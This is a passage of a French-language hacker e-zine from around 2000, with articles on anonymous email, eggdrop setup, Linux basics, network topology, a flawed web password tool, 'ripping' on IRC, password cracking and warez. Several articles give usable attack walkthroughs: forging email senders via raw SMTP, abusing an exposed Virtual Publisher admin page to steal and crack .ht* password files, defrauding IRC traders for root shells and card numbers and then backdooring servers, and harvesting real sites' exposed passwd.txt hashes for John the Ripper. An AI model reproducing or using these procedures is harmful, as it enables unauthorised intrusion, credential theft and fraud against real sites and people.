	*<ulysse31> à propos du sacrifice des loups?					*
	*************************************************************************



    ___________________________________________________
   / 						       		 \
  | [07]-- Anonymous Mail					  |
  | 	   			Par Mind Flayer			  |
  |                       				        |
  |							              |
   \___________________________________________________/


 Comment envoyer un e-mail anonyme?

 Bonjour bande de l33t. Bon je sait le sujet a été abondamment exploiter et des dizaines 
 d'articles on été écrit sur le sujet mais bon, question de ne pas etre en reste et surtout,
 de ne pas recevoir d'article sur le sujet, et quand meme tout d'un coup que vous ne connaissez
 pas la méthode, nous allons vous la montrer. Mais priere, soyer pas asser con pour envoyer
 une fausse demande de rancon comme le cave qui as fait ca pour Julie Surprenant, non mais tsé
 c'est quoi l'idée de se sentir hot en donnant un lueur d'espoir a un pere de revoir sa fille
 en vie et immediatement apres se faire enlever le seul espoir qui lui restait...
 Tk faites pas de conneries du genre avec ca :)

 Bon premierement il vous faut un serveur mail qui va servir de victime.
 Il vous faut aussi un client telnet (telnet.exe de windows fais l'affaire)
 Ah oui, il vous faut aussi une tete sur les épaules , mais dans le fond, c pas plus
 dur que de faire un recette de spagh alors pas besoin qui aille beaucoup de neurones
 dans la tete...

 Bon premiere étape
 Menu Démarrer/Éxecuter/ telnet.exe
 La ya une grosse fenetre l33t blanche ( par default la mienne est turquoise question que le 
 blanc sur noir ca fatigue les yeux a longue) qui apparait, fermer pas l'ordi en paniquant 
 ca mord pas un fenetre telnet...

 Bon ensuite tu te connecte sur un serveur smtp (port 25) de ton choix.
 bon g prit www.boite.qc.ca pour faire l'exemple

 La sa marque de quoi du genre
 220 relief.netgraphe.com ESMTP Sendmail 8.9.1b+Sun/8.9.1; Mon, 24 Apr 2000 13:03
 :06 -0400 (EDT)

 bon tu peux toujours te spoofer par un proxy telnet  avant, c encore + anonyme
 la tu fais (respecter les majuscules et minuscules si vous voulez que ca marche)
 HELO boite.qc.ca
 c'est pour pas que le serveur mettre votre ip dans le e-mail ( si vous etes derriere un proxy 
 telnet c pas votre ip mais entk on s'en criss)
 le serveur reponds de quoi du genre de
 250 rubinet.rubilog.qc.ca
 apres vous faites (par exemple, bien sur vous pouver changer le mail pour celui vous vouler)
 mail from:l33t@rules.the.world.com
 250 Sender <l33t@rules.the.world.com> Ok
 rendu a cetet étape vous devez marquer le destinataire du e-mail
 RCPT TO:mind@underdark.cc
 250 Recipient <mind@underdark.cc> Ok
 bon la vous marquer 
 data
 pour commencer a ecrire le e-mail
 vous ecriver votre mail et vous termininer le tout par un "." seul sur la derniere 
 ligne du mail ce qui enverras le message.

 Et voila c'est pas tres compliquer, suffit de se servir de cette technique intelligement.

										Mind Flayer

									
 	*************************************************************************
	* 				Random Quote Player					*			
      *<[ewoks]> heaven doit etre un rejet dans vrai vie pi pour remonter sont* 
	* 	     ego y essaie d etre puissant sur le net				*
	*<__2> ewoks										*
	*<__2> ris pas de mon mode de vie ;]						*
	*												*
	*************************************************************************


    ___________________________________________________
   / 						       		 \
  | [08]-- How To Set A Eggdrop On A Shell		  |
  | 	   						Par Waxed	  |
  |                       				        |
  |							              |
   \___________________________________________________/

Pour configurer sont 1er eggdrop sur un shell comment on fait? Et bien c,est très simple il
faut juste avoir un shell(linux ou Unix) pour les ti lamer qui dise qui run un winegg ben 
des winegg SA SUCK compris donc crisser sa a poubelle pis acheter vous un shell.

Il vous faut un eggdrop comme le eggdrop1.3.28.tar.gz 

Le eggdrop1.3.28.tar.gz c'est le meilleur selon moi car c'est lui que j'utilise le plus 
souvent

1- Tu upload le eggdrop dans le shell et tu fait la commande :

tar -zxvf eggdrop1.3.28.tar.gz

si c'est le eggdrop1.3.28.tar.gz que t'a sinon remplace le 
eggdrop1.3.28.tar.gz par celui que tu utilise

2- tu configure le eggdrop en fesant
   cd eggdrop1.3.28 ensuite
  ./configure

3- Ensuite tu fait
   make install DEST=~/eggdrop
   Et tu upload ton .conf de eggdrop ;)
 
 
 	*************************************************************************
	* 				Random Quote Player					*								
	*												*
	*<WaxeD> tu run en win95 ou 98 ?							*
	* <Ch|L> lé 2										*
	*												*
	*************************************************************************


    ___________________________________________________
   / 						      		 \		
  | [09]-- The Linux World			     	        |
  | 	   			Par [ALIENS]			  |
  |                       					  |
  |									  | 
   \___________________________________________________/

       ______
       /      \
      |      0 |
      |()___() |
      | /   \  |
      | \---/  |   --------> The Linux World
     /   \_/    \  --------> By [ALIENS]
    /  -     --  \
   /       ;     |\
  ;|       ;     | \
   \   |         |\ \
  /\\  \          / / 
 /|/\\  \        / /
|    \\(^)     /(^)/\/\
 \___/\________\     /
                \___/

-FOREWORD- 
Cher lecteur , si vous connaissez linux sachez que ceci n'est que cet article n'est pas pour
vous et qu'il est adressé a ceux qui veulent installer ou connaissent pas linux . J'espere que
cette lecture pourra donc vous renseigné .

-Story Of Linux
Nous devons la stabilité remarquable de Linux ( son Kernel ) a Linus Torwalds , un Finlandais
qui étudiais a Helsinki . C'est lui qui a inventé la premiere petite version de linux 
en 1991 pour cest propre besoin . La raison qui a rendu sa creation si reconnu fut lidée
du Open Source . The GNU project cest tout de suite join a sa creation . Le Open Source fait
avancé beaucoup Linux et fait encore avancé beaucoup de projet comme Apache qui fait 
fonctionner plus de 50 % des servers sur le web . Des projets que vous connaissez surement 
possede une licence Open Source , BSD : Berkeley Software Developement et GPL : General 
Public Licence . 

Maintenant , je vais vous parlez un peu en general les questions que les win users se posent
avant de faire un pas vers linux . Donc sachez que ceux qui connaissent linux ben spa vraiment
pour vous ni pour le monde qui connaissent linux par coeur mais qui ont jamais su comment
utiliser le bash shell . Mais pour commencer , je vais faire une brieve comparaison entre linux
et le populaire windows .

&&&&&&&&&&&&-Windows-&&&&&&&&&&&&& ---------Against--------- &&&&&&&&&&&-Linux-&&&&&&&&&&&&&&
Il est tres populaire et offre                               Un peu difficile au debut
un systeme plus facile a                                     surtout a la configuration
utiliser et a configurer .                                   et particulierement sa partition
----------------------------------                           --------------------------------
Windows offre de planté sois au 5                            Le kernel de linux est fortement
minutes ou au 5 heures .                                     reconnu pour etre extremement 
*                                                            stable .
----------------------------------                           --------------------------------
Il y a beaucoup de virus sous win.                           Les virus sous linux existe 
*                                                            mais en tres forte minorité a
*                                                            coté de windows.
----------------------------------                           --------------------------------
Les updates sont rares et cher .                             Les versions de linux sortent
Les bugs sont courant.                                       presque à chaque fois que les
*                                                            programmeur decouvre un bug .
----------------------------------                           --------------------------------
Windows offre plein de programme                             Les programmes sont tous coder
copié comme je fais reference à                              par opensource et révisé par
Netscape .                                                   dautres codeurs .
----------------------------------                           --------------------------------
Windows ne vous permet pas de le                             Si vous etes un bon codeur , 
modifier selon vos souhait . Vous                            vous pourrez donc modifier le
etes comme une personne avec un                              source code de linux et pouvoir
bloc de ciment sur les pieds .                               modifier ce que vous voudrez en
*                                                            recompilant le kernel par exemple
----------------------------------                           --------------------------------

Bon jespere que vous , windows user , voyez ce que vous endurez . Chaqun de vous jen suis sur
aurais une bonne raison a me dire pour rester sous win . Ipso Facto , je suis moi aussi
encore avec windows . Par contre , plusieurs sont plus porté a se dire que 
Linux = leet = Hacker et je suis contre cet idealiste . Je crois que l'on peut etre hacker 
leet tout en etant sous windows . 

Maintenant passons plus au renseignement general qu'une personne devrait savoir avant de se 
préparé a installer linux .

-Les Interphases Graphiques
Au tout debut , Linux était utiliser seulement dans un Terminal ou un exemple simple le MSDOS .
Plus tard avec les developements , une idée est venu d'en faire changer lapparence . Il se sont 
rapprocher des environnement X-Window et quitter un peu le Unix like . Le processus X-Window le
plus évolué et le plus reconnu est le KDE ( K Desktop Envirronement ) . Celui-ci est parti 
d'une idée basé sur des fonctions avancés "Drag and Drop" et un contenu HTML intégré . 
KDE est facilement comparable a GNOME . GNOME est un projet qui voulais créé un envirronement
Graphique basé sur des "Graphic Librairies" .

-How they Build Linux ?
Comment linux est fait est simple . Vous allez retrouvé dans les sources codes du C , du 
PERL (assemblage du meilleur du C et du pascal ) un peu de Turbo Pascal . Dans le font cher 
lecteur ,Linux a été créé par les meilleurs coders , pour les meilleurs . 

-How To Install
La difficulté la plus rencontré dans Linux est linstallation . Si vous echouer et bien vous
gagné une chance de dire Adieu a votre Hard Drive . Si vous le configurer bien alors vous
aurez la chance d'avancé votre knowledge personnel .

Pour l'installer , je vous suggere dacheter le CD . Meme si on peut le downloader , vous n'avez
pas le support ni , la plupart du temp , une version complete . Je vous suggere de prendre 
un ordi second , car faire des partitions n'est pas facile quand on en a jamais fait . 

-Comment faire des partitions ?
2 choix soffrent a vous , le premier étant les populaires Partitions Magiques . Et le second est
Fdisk . Je vous suggere Fdisk car il est plus stable . Celui-ci va etre utiliser pendant
linstallation et il va vous demander de faire une partition ou formatter tout . Vous déciderez
par consequant de votre choix . Il existe aussi un programme deja intégré dans linux . Fips ,
je le vous recommande pas si vous faite pas de backup avant de partionner . Il perd souvent 
de linformation pendant le partitionnage .

Vous devrez donc faire une partition :
-Windows ( Si vous le gardez )
-Linux Swap ( Sert aux RAM . Référé vous en bas pour son utilisation )
-Linux Native ( La mémoire de votre Racine Linux )

-Linux Swap
Vous devez savoir a quoi sert les meg de RAM . Vous avez surement du deja entendre votre PC
faire des sons étranges sur votre Hard drive . Et bien , cest parce que vos RAM sont épuisé
et windows en a besoin de dautre . Elle les prend de votre Hard drive en grugeant de la memoire .
Pas trop pratique non ? Donc , linux , une fois les RAM terminer vas les reloader en utilisant 
le Swap qui est la memoire permise pour le grugeage mais qui ne fera pas d'horrible son 
comme Windows. 

-Linux Native
Bon , que dire la dessu , cest la partition que linux va utiliser . Si vous downloader un prog
sous windows pour linux . Vous pouvez installez le prog nimporte ou car vous irez dans /DOS/
et vous pourrez y avoir access . /DOS/ = Windows

-Avoir le materiel requis
Linux devien de plus en plus évolué , vous allez surement pouvoir linstaller sur tout les genre
dordinateur , excepté Mac . Vous avez juste a choisir une version pas trop élevé pour les 486
( Linux based on i386 ) et genre Red Hat 6.* pour des ordis performants . 

-Failles
Et bien , ici est la question de securiter de votre linux . Il est temp daller lire 
www.insecure.org et de regarder les failles vous concernante pi les évité en configurant votre
linux . La plupart des hack sont des Overflows et des Root Access . Je crois que vous aurez
pas 10 heures a passé a regarder toutes les failles possibles . 

-Install
Si vous achetez le CD , et bien vous allez avoir un livret qui va vous aidez pendant 
linstallation . Si jamais vous n'utilisez pas le livret , et vous netes pas sure d'une des 
configurations , abortez tout sinon vous pouvez fucker lordi . N'oubliez pas qu'avant 
l'installation sa serais utile de savoir des renseignements sur votre Hardware comme 
la Carte de son , la carte de modem , ect.

-Modem Cable et modem Telephonique
Plusieurs cartes de modem cable ne seront pas detecté . Vous devez utiliser une carte ISA si
votre carte n'est pas detecté . Dans linstallation , si vous avez un modem cable essayer 
la carte NE2000 PCI Compatible . 

Par contre , si vous avez un modem telephonique il suffit de configurer le tout pour utiliser
le DHCP , le protocol supporté par Linux et Unix.

-Le Bash Shell

C'est important de connaitre le bash shell . Cest le terminal emulation que vous allez surement
avoir dans votre K desktop . Le bash shell pourrait se comparer a msDOS . Mais bien sur , 
fallais qui aille quelque chose de different .

Ctrl-A Revenir au debut de la ligne
Ctrl-U Effacer la ligne courante
Ctrl-C Arreter le program en fonction

Commande = X
Pour connaitre les options de "X"
Utiliser Man X

->su -         Permet de se logguer en root
->su -l user   Permet de vous logguer en un tel user


->cd
cd .. 		   Permet d'aller au dossier précédent
cd Nom_du_dossier  Permet d'aller au dossier choisi

->ls
ls = List files 
Utiliser -A pour voir les fichiers caché et -l pour les longs nom de fichier
ex: ls -al /usr/ALIENS/bin/
tapper : man ls
pour voir les options valable pour ls  --> je vous conseille d'insérrer dans votre .bashrc 
(il se trouve ds votre directory home) la ligne suivant : alias ls='ls --color -A'. 
Cela vous permetera de voir les fichiers de diférente couleurs et de voir les fichier cacher 
en tapant un simple ls

->rm
Utilisé pour effacer un fichier , le fichier ne passe pas par aucun Trash ... Il est 
irrécuperable. Utiliser -i pour demander la confirmation et -r pour deleter directement

->mkdir & rmdir
Sert a Ajouter un directory ( mkdir ) et en effacer un ( rmdir )
Syntax : rmdir/mkdir Directory_name

->More & Less
 Utiliser pour visionner un fichier sans le modifier ( more )
 Le Less Command performe mieu parce qu'il vous permet de revenir en arriere .

->Grep
Utiliser pour chercher un String de caracter dun file
grep string_file

-Ps
Cette commande liste les applications qui sont presentement en fonction.

->Kill
Sert a arreter une application . Utiliser kill -s <file> quand lapplication ne repond pu .

->Tar
Utiliser editer ou créé un fichier Unix .
tar -zxvf name.of.the.file.tar.gz
ou tar -c rep/ > rep.tar
gzip rep.tar
tar-xvf name.file.tar.gz


-Linux Look

J'imagine que c'est la plupart du temps ce que des gens qui connaissent pas Linux se disent .
Ceux qui se donne pas le temps de lessayer ou de se renseigné car dans leur tete Linux
est trop compliqué pour qui quonque . Sachez que Linux , avec son Interphase graphique
KDE est presque semblable a Windows . Un utilisateur Windows pourrait facilement se debrouiller
avec Linux ( Version Récente ) . Évidemment , Linux a des commandes differente mais sa 
s'apprend vite . 

-NEWS
Si vous croyez que Linux est inaccessible et bien sachez que bientot , soit maximum 5 ans .
Nous verons surement un nouveau kit special chez Bureau en GROS comme celui-ci :
Ordinateur 2Ghz Pentium8 , 2Gig RAM , Lecteur DVD CD-BRN , Écran cristaux liquide , Linux OS
intégré Red Hat 20.1 , Hard Drive Quantum 250 Gig . Connection Internet T1 .

-Conclusion
Je ferais surement dautre article pour mieu vous expliquez les failles de configuration de 
linux et etc . J'espere que cet article vous a plus et vous a aidé a mieu connaitre ce OS si 
bien concu
													[ALIENS] 


 	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<KaTaKaR> Menva a un party ds un camps de bucheron sans bucheron		*							
	*<MindFlayR> tant que ya du hach :)							*
      *												*
	*************************************************************************

    ___________________________________________________
   / 						      		 \		
  | [10]-- Les Reseaux				     	        |
  | 	   			Par RandlK				  |
  |                       					  |
  |									  | 
   \___________________________________________________/



Parti #1:  Topologie standars (Type de réseau)
           Brève explication sur les modèles OSI


Je tien à vous précisé en premier lieu que cette article ne traitera pas de sujet comme le 
hacking phreaking ou anarchisme. Seul les Topologies standars et modèles OSI sera expliquer 
dans cet article. Cette article n'est que le 1iere d'une série de 3 articles qui vous 
expliquerons la fonctionnalité des réseaux.

-Qu'est-ce que la Topologie standars?

Il existe trois types de topologie: En étoile en anneau et en bus linéaire.
La topologie est une façon d'organiser les ordinateurs en sorte qu'ils soient connecté 
ensemble. chaque topologie a son mode différent d'etres relier entre eux.

Topologie en bus: Cette façon est une des plus utilisé, elle consiste à relier tous les 
			ordinateurs du réseau un a la suite des autes relier par un cable.

                  Cette topologie qui est constituer de généralement de pas plus de 5 
			ordinateurs ne permet qu'à un ordinateur à la fois d'envoyé des informations.
                	Toutes les données sont émises sur le réseau. Les pakets sont acceptées que 
			par lordinateur dont le numéro correspond à celle qui a été programmé comme 
			adresse de destination de la trame. Un seul ordinateur à la fois peut 
			envoyer des données.

                  Seul 1 ordinateur peu envoyer de l'information, donc, plus il y a 
			d'ordinateur connecté a se réseau, plus celui-ci ralentie.

Topologie en Anneau: 
			Dans cette topologie les ordinateurs son connecté sur un seul segment de 
			cable. Les données sont transmise à tous les ordinateurs contrairement à 
			la topologie en bus qui, seul un ordinateur recois l'information. Malgré 
			cela, se systeme à une faille, dès que un ordinateur tombe en panne, cela 
			affecte le réseau entier puisqu'il est connecté que sur un cable qui forme 
			une boucle.

                     

Topologie en étoile: 
			Celle-ci est différente au autre. Les ordinateurs son relié a un composant
                  central apellé le 'HUB'. Le 'HUB' sert à envoyé les informations vers les
                  autre ordinateurs qui y sont connecté. 

                  Le désavantage dans cette topologie est que si le 'HUB' tombe en panne, tous
                  le réseau suivera sa chute. En plus, cette topologie est vielle et nécéssite
                  beaucoup de cable.

                  Contrairement à d'autre topologie, si un ordinateur tombe en panne (excluant
                  le HUB) celui si n'affectera pas le réseau toute entier!

- End of topologie -

-Modèle OSI?

 Le modèle OSI est une communication des protocole et équipements défini en sept couches réseau.
 Chaque couche réseau à sa fonction. Il en existe sept:
                                                        Couche physique      (1)
                                                        Couche Liaison       (2)
                                                        Couche Réseau        (3)
                                                        Couche Transport     (4)
                                                        Couche Session       (5)
                                                        Couche Présentation  (6)
                                                        Couche Application   (7)

 Chaque couche à une fonction différente et à pour but de donné des indications à la couche
 supérieure.


Couche Physique: 	La couche physique détermine les interfaces électriques et fonctionnel avec 
			le câble Celle-ci gère tous signaux produites par les autres couches 
			supérieure.
                 
                 	Elle sert à établir la facon dont le cable par exemple est connecté à la 
			carte réseau. Elle est aussi responsable de la transmission de bits entre 
			deux ordinateurs et aussi elle définit l'encodage des donnés de la 
			synchronisation des bits. (Ceci sera expliquer d'avantage dans le #2)

Couche Liaison: 	Celle-ci envois des donnés à la couche réseau et à la couche physique, elle 
			est responsable du transfert sans erreur de deux ordinateurs qui passe par 
			l'intermédiaire de la couche physique se qui permet à la couche réseau 
			d'assumer une transmission sans erreur sur le réseau. Cette couche d'après 
			moi est une des plus complexe parce qu'elle effectue en parti la tache des 
			deux.

Couche réseau: 	La couche réseau défini ou doit se rendre l'information destiné. Quelle 
			ordinateur sur le réseau doit recevoir l'information, le débloquage du 
			traffic sur le réseau et d'autre nombreux facteur d'encombrement qui circule 
			sur le réseau.
 
               	En fait, cette couche sert au routage des packets ex.: Le bon nombre de 
			donné à envoyé à la carte réseau. Ainsi que l'envois des messages de 
			l'ordinateur central à l'ordinateur source.

Couche transport: Cette couche s'occupe d'assurer la transmission des pakets transmis dans le 
			réseau sans erreur. Elle s'occupe du taux d'éerreur résiduel dans le réseau 
			ainsi elle s'occupe de la probabilité que le réseau tombe en panne. En fais, 
			cette couche est très utile pour regarder la fiabilité du réseau ainsi que 
			de regarder si les pakets se sont transmis sans erreur.

Couche session: 	Est surement la couche la plus important pour permette a 2 ordinateurs de se 
			connecté entre eux. Elle permet d'assuré la communication entre deux 
			ordinateurs ainsi que de geré la sécurité nécesseraire pour permete a deux 
			applications de communiquer sur le réseau.

                	Elle désigne aussi la duré de la transmission ainsi que le moment de 
			communication. De cette facon, seule les dernières donnés seront retransmises
			si le réseau tombe en panne.

Couche présentation: 	
			La couche présentation sert à décoder l'information recu ex.: 
			l'ordinateur central (celui-ci) s'occupe que le message envoyé a l'ordinateur
			cible soit lisible pour celle-ci. Elle décrypte les donnés en fonction que 	
			l'ordinateur qui va recevoir les donnés sois capable d'executé ces donnés 
			transmise. L'ordinateur pour ensuite reconnaitre le fichier envoyé utilise
                  la couche Application.

                  Elle est aussi employé pour la conversion de différent protocol et 
			l'encryptage de données. Cela ne s'arrête pas là, elle est aussi utilisé 
			pour réduire les données envoyé a son minimal
                  Ex.: Réduire le nombre de bits à transmettre à la machine cible.

Couche application: 
			La couche application, enfin, celle-ci est situer au sommet des modèles OSI. 
			Cette couche est très simple. Elle correspond au service t-elle que l'a 
			mésagerie électronique et tous les logiciels réseau qui y sont.

                    
 
 Le #2 traitera d'installation de réseau ainsi qu'au materiel à utilisé. Le #1 à été 
 brièvement expliquer si vous exprouvez des commentaires à me faire parvenir envoyé moi un 
 e-mail RandlK@caramail.com, je devrais vous répondre au 24 heures qui suive.

 Bref apercu des autres articles: 
                                  #1) Explications des modèles OSI, type de réseau.
                                  #2) Erreur technique que votre réseau pourra démontré.
                                  #3) Résumer de tous les articles, Code Manchester, 
						  norme de l'IEE et davantage.
 RandlK
 RandlK@caramail.com




 	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<Sad43v3r> ohh when im in lack of alcohol the only things i want iz my *
	*turbojet..my turbojet.. complete with my turrrboo... turbojet.. my 	*
	*turbojet.. i looovvee my tuurrrrrrbbbbooojeettt				*
      *												*
	*************************************************************************



    ___________________________________________________
   / 						      		 \		
  | [11]-- Virtual Publisher, a security?? tools        |
  | 	   			Par Mind Flayer			  |
  |                       					  |
  |									  | 
   \___________________________________________________/


En surfant sur le net, j'ai decouvert un outil de sécurité pas tres securitaire, Virtual 
Publisher. Jme suis dit que un petit article sur le sujet vous dissuaderais de l'utiliser...

What the hell is Virtual Publisher Password System?
Bon, en gros c'est un utilitaire qui permet de rendre un sous-dossier de site web secure.
Genre chui webmaster de www.compagnie.com pis jveux proteger des fichiers de mes concurents
tout en laissant mes associés acceder a ses fichiers... Mettons que vous etes un admin et que
vous voulez proteger un fichier appeller secure, le chemin d'access sera du genre de
/www/userid/secure/
Ca protege le fichier avec un systeme login/pass comme sur les site xxx.
Le probleme, c'est que tout le monde peux s'adder tellement c boueteux. Suffit d'aller sur
http://www.compagnie.com/password/admin.html
La on tombe sur une genre de page avec un beau titre: "Password Access Administrator's Page"
La page nous fournit meme toute les intruction pour securiser un nouveau sous-fichier, s'adder
pour avoir un l/p qui nous mene au dossier secure etc... On peux aussi enlever des access.
Ah oui j'oubliais, il existe des categorie d'utilisateur (group) comme sous unix. Suffit de
s'adder a tout les groupes pour avoir access partout.
Bon qu'est-ce qu'on fout avec ca?
Tout simplement , on s'add dans un groupe, ensuite suffit d'aller dans le repertoire
secure du site et de getter les fichier .ht* . Apres suffit de decrypter et on possede tout
les pass, suffit de chercher quel l/p vas sur le ftp, shell etc et on peux tout owner.

Bon c'est pas facile a expliquer mais c'est asser simple a comprendre donc le meilleur moyen
c'est de tester. Si vous comprener pas venez me voir sur irc ou mailer moi 
root@underdark.cc

									Mind Flayer



 	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<Zetelnet> black ice defender, sound like un gars qui a trop jouer 	*
	*		a shadowrun									*
	*												*
	*												*
	*************************************************************************

 
    ___________________________________________________
   /						      		 \		
  | [12]-- Cheapest Hacking			     	        |
  | 	   			Par Mind Flayer			  |
  |                       					  |
  |									  | 
   \___________________________________________________/



  .---------------------------------.
 /       _______       _______       \
|     .-'       '-. .-'       '-.     |		Oui, vous aller savoir comment avoir
|   .'            .'.            '.   |		des numéros de cartes de crédit sans effort!
|  /             /===\ __          \  |
| | |  | _  _ |_ _=,_=/  \ _ ,_  _| | |
| | |\/|`_)(_ | /_)|=`|   `_)| `/ | | |
| | |  |(_(,_)\_\__|==\__/(_(|  \_| | |
|  \             \===/             /  |
|   '.            '.'            .'   |
|     '-._______.-' '-._______.-'     |
 \                                   /
  '---------------------------------'


Bonjour, j'ai décidé de vous parlez de la forme la plus cheap, la plus sale pis 
la plus indigne de hacking, le ripping. Le ripping est un mot qui veux dire 3 choses
1- Quand on transforme un cd en mp3 on le rip
2- Quand on copie le travail d'un autre on le rip
3- Quand on echange sans donner notre part on rip

Je vas vous parler de la troisieme definition

How In The Hell Rip In EFnet?
-----------------------------

First i faut etre spoofer, tout simplement que des gens ne prenne pas d'etre ripper et pogne 
les nerfs, alors un smurf 24/7 sur notre ip n'est p-t pas la meilleur idée.
Pour les besoins de la cause, on va se spoofer en utilisant une wingate comme vous l'avez 
peut-etre appris precedement ( voir article de [_}{Ead_] ). On peux aussi utiliser un bnc
ou tout autre moyen de camoufler notre host. A oui, en passant EFnet accepte pas les gate
facilement alors connecter vous sur irc.total.net qui est un serveur EFnet mal proteger.
Bon maintenant qu'on est plugger qu'est-ce qu'on fait?
tout simplement on join des channels comme #shell, #shellz, #carding, #trading, #cc etc...
on attend une annonce du genre de 

* S7r4ng3 trades ROOT SHELLS!
* pacman- is trading shells/bncs/ccz .. /msg me to trade

etc....

Apres suffit d'aller voir le gars pis de trader. Bon vous vous dites que y vous faut 
de quoi a trader contre... C'est pas vraiment necessaire, la tactique consiste a verifier le
shell en premier. On peux aussi se faire des #cc asser facilement en utilisant la meme methode.
Cependant, c'est pas toujours aussi facile que ca, des fois il faut risquer un peu plus pour
obtenir quelque chose de bon. Une bonne tactik si on a une box linux ou peu importe est de 
creer un account qu'on va trader plusieurs fois contre ce que nous desirons. Si on est pas sous
linux ou peux toujours demander a un pote. Il est aussi preferable d'avoir une connection 
internet qui n'a pas de ip permanent. Il suffira alors de se deconnecter du net et de deleter
l'account qu'on a trader pour avoir quelque shell pour pas cher du tout...

C'est pas vraiment compliquer ni correct mais bon crosser des anglais c'est quand meme une
activité asser plaisante. Pis si on est capable de ripper un root, suffit de foutre une 
backdoor pour le conserver pour un bon petit boute. SVP, abusez pas de cette technique parce
que c'est quand meme asser sale mais ca peux toujours nous aider pour apprendre a se servir de
shell sur different OS et meme, avoir quelque eggdrop pour pas une maudite cenne!

											Mind Flayer  





 	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<budda> objectivement, je ne considère pas que l'on puisse prendre au 	*
	*sérieux un maniaco-dépressif paranoiaque qui est resté 5 ans de sa vie *
	*cloitré chez lui à écrire ses livres						*
	*												*
	*************************************************************************




    ___________________________________________________
   / 						       		 \		
  | [13]-- Find A Pass					        |
  | 	   			Par vi0l4t0r		        |
  |                       				        |
  |							              | 
   \___________________________________________________/



bon bon bon voici mon article sur un moyen ben rapide de trouver un 
password à l'aide de deux p'tits progzs: John The Ripper et WebFerret ;)

bon commencons par allé trouver ce prog là sul web:

pour les linuxiens, http://packetstorm.securify.com (taper john dans
search)

pour ceux qui ont win, http://astalavista.box.sk (taper john aussi)


j'vous conseil personnellement la version 1.6 ... bon après avoir d/l
ca ca vous prends un password a decrypter.. ca s'ras pas ben ben dur a
trouver grace a un ptit prog génial WebFerret :P (dsl il n'y a pas de
webferret pour linux donc le reste de l'article sera pour les users de
window$)

dowloader WebFerret,  http://www.ferretsoft.com (et clickez sur Free
Downloads)

bon maintenant que vous avez votre password searcher, votre decrypter
de passwords y vous reste une petite chose très utile mais pas
absolument nécessaire mais plutot pratique (pour decrypter un ptit peu
plus rapidement)

de bonnes words list, http://www.anticode.com (allé voir Word Lists
dans Text Files)

bon là vous êtes fin prêt a pogner un passwords !

une fois webferret installé, ouvrez le, taper passwd.txt et clicker sur
find now.. maintenant vous voyez apparaitre une liste inombrable de 
sites, vous devez regarder ceux qui se terminent par passwd.txt...
regardons quelques résultats:

Name                                                 Adress                                                       Source

www.news-journalonline.com/scene/wdyt/passwd.txt     http://www.news-journalonline.com/scene/wdyt/passwd.txt      Google
Index of /requests                                   http://tgo99.ga-sports.com/requests/                         Lycos (USA)
www.kellermann-online.com/wwwboard/passwd.txt        http://www.kellermann-online.com/wwwboard/passwd.txt         Google
Index of /                                           http://www.granum.de/                                        Lycos (USA)


ici on a deux sites qui pourrait être très intéressant, mais on ne 
sais pas a quoi les passwords servent.. alors veuillez juste mettre 
votre cursor sur le nom du site (dans ce cas ci le premier) vous voyez 
une chose comme ceci apparaitre:

njcenter:aeKpWiUAqIl02

hummm.. très interesting on a notre password crypter mais il nous sert 
absolument a rien, nous avons donc a le decrypter.. après avoir mit 
votre password crypter dans un fichier txt et l'avoir placer dans c:\ 
(pour exemple news-journalonline-com.txt) nous fesons entré en jeu le 
prog John The Ripper..

ouvrez une fenêtre DoS:

allez dans le répertoire de john par exemple, c:\hax0r\john-16\run
et taper john...

voilà ce que vous devez apercevoir:


John The Ripper  Version 1.6  Copyright (c) 1996-98 by Solar Designer

Usage: /HAX0R/JOHN-16/RUN/john [OPTIONS] [PASSWORD-FILES]
-single                   "single crack" mode
-wordfile:FILE -stdin     wordlist mode, read words from FILE or stdin
-rules                    enable rules for wordlist mode
-incremental[:MODE]       incremental mode [using section MODE]
-external:MODE            external mode or word filter
-stdout[:LENGTH]          no cracking, just write words to stdout
-restore[:FILE]           restore an interrupted session [from FILE]
-session:FILE             set session file name to FILE
-status[:FILE]            print status of a session [from FILE]
-makechars:FILE           make a charset, FILE will be overwritten
-show                     show cracked passwords
-test                     perform a benchmark
-users:[-]LOGIN|UID[,..]  load this (these) user(s) only
-groups:[-]GID[,..]       load users of this (these) group(s) only
-shells:[-]SHELL[,..]     load users with this (these) shell(s) only
-salts:[-]COUNT           load salts with at least COUNT passwords only
-format:NAME              force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL            enable memory saving, at LEVEL 1..3

si vous ne voyez pas ca, vous avez un sérieux problème :P

now... si vous voulez utilisez votre word list mettez là dans le
fichier de john (dans ce cas ci, c:\hax0r\john-16\run) et faite cette
commande:

john -wordfile:nom_de_la_word_list.txt c:\news-journalonline-com.txt

et voilà il a commencer a decrypter.. si vous etes pas mal plus patient
et voulez être sur de trouvez le pass vous devez faire ceci:

john -incremental:all c:\news-journalonline-com.txt

ce proceder est vraiment mais vraiment long mais pas mal plus sur que
avec une simple word list.. une fois le decrypt fini la commande -show
est pratique pour savoir les passwords trouvés et maintenant que vous
avez le pass je n'ai qu'un mot a vous dire.....

enj0y !!! ;))

- vi0l4t0r

 


	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<|Shinny|> has joined #iga								*
	*<|Shinny|> yas-tu qqun qui as un NIN64 à vendre				*
	*												*
	*************************************************************************




    ___________________________________________________
   / 						       		 \		
  | [14]-- Warez 101					        |
  | 	   			Par Bilb0			        |
  |                       				        |
  |							              | 
   \___________________________________________________/


================================= INTRO ============================================

Je sais que cet article à déjà sorti avec le e-zine de QHA (quoi dit en passant
que aujourd'hui je le regrette) mais vu que personne lit les zines de QHA j'me
suis dit j'va le remaker pis le sortir avec un autre qui risque de mieux poigné :oP
Pis en passant Venez pas m'écouerer si c n'est pas vraiment la bonne définition...
moi j'ai écrit ca comment je vois chaque chose selon moi point de vue. Alors les
chercheux de ptites bibittes noire veuillez vous asbtenir. Merci

====================================================================================

Hé oui cette cronique va parler de warez... Mais la n'ouvrez pas votre client
FTP car je ne donne pas de site leech perm avec 0-day... Bon pour commencer 
nous allons expliquer les termes utiles pour tout bon warezeux.

Leech = Qui ne contient pas de ratio ( vraiment cool ;o) )

Ratio = Un quota établie par le Site Op afin d éviter les leecheur ( ceux qui
font juste d/l (downloader) ). Un Ratio s établie avec le nombre de megs ou de
files. Nous determinons le ratio comme une fraction. Le premier chiffre est pour
